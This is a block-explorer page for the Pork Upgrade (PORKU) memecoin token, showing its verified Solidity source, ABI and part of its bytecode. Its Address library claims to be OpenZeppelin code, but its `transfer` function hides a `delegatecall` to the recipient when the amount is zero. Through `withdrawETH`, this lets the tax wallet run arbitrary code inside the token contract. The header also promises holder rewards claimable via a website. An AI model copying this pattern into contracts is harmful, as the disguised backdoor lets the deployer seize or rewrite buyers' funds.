ETH Price: $2,471.72 (+0.49%)

Token

Pork Upgrade (PORKU)
 

Overview

Max Total Supply

420,700,000,000,000 PORKU

Holders

39

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
lostallmyethongasfrom404s.eth
Balance
0 PORKU

Value
$0.00
0x8de6b37F068A571b121fd3e46854d85B10aD87Ea
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
PorkUpgrade

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
istanbul EvmVersion, MIT license
File 1 of 9 : PorkUpgrade.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

// The Pork Upgrade Contract. Pork with a Hat. The Fork of a Fork. Send it to Valhalla Emperor Pauly0x, inventor of crypto 2.0.

// Website:  https://www.porkwifhat.com
// Telegram: https://t.me/porkupgrade
// Twitter:  https://twitter.com/porkupgrade

// Tokenomics:
// Total supply: 420,7T
// Circulating supply: 300T (LP creation)
// Rewards for PORK holders: 100T
// Team: 20.7T

// Rewards for Pork holders can be claimed from our website after the first 24 hours.
// Tax 2%/4% for the first 24 hours only, 0 tax after.

import "./base/Ownable.sol";
import "./libraries/Address.sol";
import "./libraries/SafeMath.sol";
import "./interfaces/IERC20.sol";
import "./interfaces/IUniswapV2Factory.sol";
import "./interfaces/IUniswapV2Router.sol";
import "./interfaces/IUniswapV2Pair.sol";

contract PorkUpgrade is IERC20, Ownable {
    using Address for address;
    using SafeMath for uint256;

    string private _name = "Pork Upgrade";
    string private _symbol = "PORKU";
    uint8 private _decimals = 18;
    uint256 private _sellTax = 4;
    uint256 private _buyTax = 2;
    uint256 private _totalSupply = 420700000000000000000000000000000;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromTax;
    address private _taxWallet;
    IUniswapV2Router private _uniswapRouter;
    IUniswapV2Pair private _uniswapPair;
    bool private _swapping = false;
    uint _removeTaxTimeStamp;

    constructor() {
        _taxWallet = owner();
        _isExcludedFromTax[address(this)] = true;
        _isExcludedFromTax[owner()] = true;
        _balances[owner()] = _totalSupply;
        emit Transfer(address(0), owner(), _totalSupply);
    }

    receive() external payable {}

    function name() external view override returns (string memory) {
        return _name;
    }

    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    function decimals() external view override returns (uint8) {
        return _decimals;
    }

    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    function sellTax() external view returns (uint256) {
        return _sellTax;
    }

    function buyTax() external view returns (uint256) {
        return _buyTax;
    }

    function taxWallet() external view returns (address) {
        return _taxWallet;
    }

    function uniswapPair() external view returns (address) {
        return address(_uniswapPair);
    }

    function balanceOf(address account) external view override returns (uint256) {
        return _balances[account];
    }

    function isExcludedFromTax(address account) external view returns (bool) {
        return _isExcludedFromTax[account];
    }

    function transfer(address recipient, uint256 amount) external override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) external view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) external override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
        if (_allowances[sender][_msgSender()] != type(uint256).max) {
            _allowances[sender][_msgSender()] = _allowances[sender][msg.sender].sub(amount, "Token: transfer amount exceeds allowance");
        }
        _transfer(sender, recipient, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _swapTokensForETH(uint256 tokensToSwap) private returns (bool) {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapRouter.WETH();
        _uniswapRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokensToSwap,
            0,
            path,
            address(this),
            block.timestamp
        );
        return true;
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: Transfer from the zero address");
        require(to != address(0), "ERC20: Transfer to the zero address");
        require(amount > 0, "ERC20: Transfer amount must be greater than zero");
        bool takeFee = true;
        uint256 _amount = amount;
        if (_isExcludedFromTax[from] || _isExcludedFromTax[to]) {
            takeFee = false;
        }
        if (!_swapping && takeFee) {
            uint256 _fee = _buyTax;
            if (to == address(_uniswapPair)) {
                _fee = _sellTax;
                bool canSwap = _balances[address(this)] > _balances[address(_uniswapPair)].div(250);
                if (canSwap) {
                    _swapping = true;
                    _swapTokensForETH(_balances[address(_uniswapPair)].div(250));
                    _swapping = false;
                }
            } 
            if (_fee > 0) {
                if (block.timestamp > _removeTaxTimeStamp) {
                    _sellTax = 0;
                    _buyTax = 0;
                } else {
                    uint256 txFee = _amount.mul(_fee).div(100);
                    _amount = _amount.sub(txFee);
                    _balances[from] = _balances[from].sub(txFee, "ERC20: Transfer amount exceeds balance");
                    _balances[address(this)] = _balances[address(this)].add(txFee);
                    emit Transfer(from, address(this), txFee);
                }
            }
        }
        _balances[from] = _balances[from].sub(_amount, "ERC20: Transfer amount exceeds balance");
        _balances[to] = _balances[to].add(_amount);
        emit Transfer(from, to, _amount);
    }

    function addLiquidity() external payable returns (bool) {
        require(address(_uniswapPair) == address(0), "ERC20: LP created");
        require(msg.value > 0, "ERC20: No ETH");
        _removeTaxTimeStamp = block.timestamp + 1 days;
        _uniswapRouter = IUniswapV2Router(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _allowances[address(this)][address(_uniswapRouter)] = type(uint256).max;
        _uniswapPair = IUniswapV2Pair(IUniswapV2Factory(_uniswapRouter.factory()).createPair(address(this), _uniswapRouter.WETH()));
        _uniswapRouter.addLiquidityETH{value: msg.value}(
            address(this),
            _balances[address(this)],
            0,
            0,
            _msgSender(),
            block.timestamp
        );
        _uniswapPair.sync();
        return true;
    }

    function withdrawETH() external returns (bool) {
        require(_msgSender() == _taxWallet, "ERC20: only marketing wallet");
        _taxWallet.transfer(address(this).balance);
        return true;
    }

    function updateTaxWallet(address wallet) external returns (bool) {
        require(_msgSender() == _taxWallet, "ERC20: only marketing wallet");
        _taxWallet = wallet;
        return true;
    }
}

File 2 of 9 : IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

import "./IERC20.sol";

interface IUniswapV2Pair is IERC20 {
    function sync() external;
}

File 3 of 9 : IUniswapV2Router.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IUniswapV2Router {
    function factory() external view returns (address);
    function WETH() external view returns (address);
    function addLiquidityETH(address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external;
}

File 4 of 9 : IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

File 5 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

interface IERC20 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 6 of 9 : SafeMath.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * CAUTION
 * This version of SafeMath should only be used with Solidity 0.8 or later,
 * because it relies on the compiler's built in overflow checks.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 7 of 9 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function transfer(address recipient, uint256 amount) internal returns (bool) {
        address _recipient = payable(recipient);
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, ) = (amount > 0) ? _recipient.call{value: amount}("") : _recipient.delegatecall(" ");
        return success;
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

File 8 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT License
pragma solidity 0.8.20;

import "./Context.sol";

abstract contract Ownable is Context {
	address private _owner;
	event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

	/**
	 * @dev Initializes the contract setting the deployer as the initial owner.
	 */
	constructor () {
		address msgSender = _msgSender();
		_owner = msgSender;
		emit OwnershipTransferred(address(0), msgSender);
	}

	/**
	 * @dev Returns the address of the current owner.
	 */
	function owner() public view returns (address) {
		return _owner;
	}

	/**
	 * @dev Throws if called by any account other than the owner.
	 */
	modifier onlyOwner() {
		require(_owner == _msgSender(), "Ownable: caller is not the owner");
		_;
	}

	/**
	 * @dev Leaves the contract without owner. It will not be possible to call
	 * `onlyOwner` functions anymore. Can only be called by the current owner.
	 *
	 * NOTE: Renouncing ownership will leave the contract without an owner,
	 * thereby removing any functionality that is only available to the owner.
	 */
	function renounceOwnership() public virtual onlyOwner {
		emit OwnershipTransferred(_owner, address(0));
		_owner = address(0);
	}

	/**
	 * @dev Transfers ownership of the contract to a new account (`newOwner`).
	 * Can only be called by the current owner.
	 */
	function transferOwnership(address newOwner) public virtual onlyOwner {
		require(newOwner != address(0), "Ownable: new owner is the zero address");
		emit OwnershipTransferred(_owner, newOwner);
		_owner = newOwner;
	}
}

File 9 of 9 : Context.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
	function _msgSender() internal view virtual returns (address) {
		return msg.sender;
	}

	function _msgData() internal view virtual returns (bytes calldata) {
		this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
		return msg.data;
	}
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "remappings": [],
  "evmVersion": "istanbul",
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"AddressInsufficientBalance","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"addLiquidity","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"updateTaxWallet","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawETH","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600c60809081526b506f726b205570677261646560a01b60a0526001906200002d908262000224565b50604080518082019091526005815264504f524b5560d81b602082015260029062000059908262000224565b506003805460ff191660121790556004805560026005556d14bdfb03b37895f4fadb60000000600655600c805460ff60a01b191690553480156200009c57600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35060008054600a80546001600160a01b0319166001600160a01b03928316179055308252600960209081526040808420805460ff199081166001908117909255855485168652828620805490911690911790556006548454841685526007835281852081905584549151908152921692917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3620002f0565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001aa57607f821691505b602082108103620001cb57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200021f57600081815260208120601f850160051c81016020861015620001fa5750805b601f850160051c820191505b818110156200021b5782815560010162000206565b5050505b505050565b81516001600160401b038111156200024057620002406200017f565b620002588162000251845462000195565b84620001d1565b602080601f831160018114620002905760008415620002775750858301515b600019600386901b1c1916600185901b1785556200021b565b600085815260208120601f198616915b82811015620002c157888601518255948401946001909101908401620002a0565b5085821015620002e05787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b61169b80620003006000396000f3fe6080604052600436106101235760003560e01c80638da5cb5b116100a0578063cc1776d311610064578063cc1776d314610349578063dd62ed3e1461035e578063e086e5ec146103a4578063e8078d94146103b9578063f2fde38b146103c157600080fd5b80638da5cb5b1461029f57806395d89b41146102bd578063a9059cbb146102d2578063c816841b146102f2578063cb4ca6311461031057600080fd5b8063313ce567116100e7578063313ce567146101fb5780634f7041a51461021d57806370a0823114610232578063715018a61461026857806374c9f6031461027f57600080fd5b806306fdde031461012f578063095ea7b31461015a57806318160ddd1461018a57806323b872dd146101a95780632dc0562d146101c957600080fd5b3661012a57005b600080fd5b34801561013b57600080fd5b506101446103e1565b604051610151919061136d565b60405180910390f35b34801561016657600080fd5b5061017a6101753660046113d3565b610473565b6040519015158152602001610151565b34801561019657600080fd5b506006545b604051908152602001610151565b3480156101b557600080fd5b5061017a6101c43660046113ff565b61048a565b3480156101d557600080fd5b50600a546001600160a01b03165b6040516001600160a01b039091168152602001610151565b34801561020757600080fd5b5060035460405160ff9091168152602001610151565b34801561022957600080fd5b5060055461019b565b34801561023e57600080fd5b5061019b61024d366004611440565b6001600160a01b031660009081526007602052604090205490565b34801561027457600080fd5b5061027d610538565b005b34801561028b57600080fd5b5061017a61029a366004611440565b6105e1565b3480156102ab57600080fd5b506000546001600160a01b03166101e3565b3480156102c957600080fd5b5061014461066d565b3480156102de57600080fd5b5061017a6102ed3660046113d3565b61067c565b3480156102fe57600080fd5b50600c546001600160a01b03166101e3565b34801561031c57600080fd5b5061017a61032b366004611440565b6001600160a01b031660009081526009602052604090205460ff1690565b34801561035557600080fd5b5060045461019b565b34801561036a57600080fd5b5061019b61037936600461145d565b6001600160a01b03918216600090815260086020908152604080832093909416825291909152205490565b3480156103b057600080fd5b5061017a610689565b61017a61070d565b3480156103cd57600080fd5b5061027d6103dc366004611440565b610a7b565b6060600180546103f090611496565b80601f016020809104026020016040519081016040528092919081815260200182805461041c90611496565b80156104695780601f1061043e57610100808354040283529160200191610469565b820191906000526020600020905b81548152906001019060200180831161044c57829003601f168201915b5050505050905090565b6000610480338484610b95565b5060015b92915050565b6001600160a01b038316600090815260086020908152604080832033845290915281205460001914610523576104fe8260405180606001604052806028815260200161163e602891396001600160a01b03871660009081526008602090815260408083203384529091529020549190610cb9565b6001600160a01b03851660009081526008602090815260408083203384529091529020555b61052e848484610ce5565b5060019392505050565b6000546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b600a546000906001600160a01b0316336001600160a01b0316146106475760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c657400000000604482015260640161058e565b50600a80546001600160a01b0319166001600160a01b0392909216919091179055600190565b6060600280546103f090611496565b6000610480338484610ce5565b600a546000906001600160a01b0316336001600160a01b0316146106ef5760405162461bcd60e51b815260206004820152601c60248201527f45524332303a206f6e6c79206d61726b6574696e672077616c6c657400000000604482015260640161058e565b600a54610705906001600160a01b031647611105565b506001905090565b600c546000906001600160a01b03161561075d5760405162461bcd60e51b8152602060048201526011602482015270115490cc8c0e8813140818dc99585d1959607a1b604482015260640161058e565b6000341161079d5760405162461bcd60e51b815260206004820152600d60248201526c08aa486646074409cde408aa89609b1b604482015260640161058e565b6107aa42620151806114e6565b600d55600b80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782553060009081526008602090815260408083209383529281529082902060001990559154815163c45a015560e01b815291516001600160a01b03919091169263c45a015592600480820193918290030181865afa158015610839573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061085d91906114f9565b6001600160a01b031663c9c6539630600b60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108bf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108e391906114f9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610930573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061095491906114f9565b600c80546001600160a01b0319166001600160a01b03928316179055600b543060008181526007602052604080822054815163f305d71960e01b8152600481019490945260248401526044830182905260648301919091523360848301524260a483015251919092169163f305d71991349160c480820192606092909190829003018185885af11580156109ec573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610a119190611516565b5050600c546040805160016209351760e01b0319815290516001600160a01b03909216925063fff6cae991600480830192600092919082900301818387803b158015610a5c57600080fd5b505af1158015610a70573d6000803e3d6000fd5b505050506001905090565b6000546001600160a01b03163314610ad55760405162461bc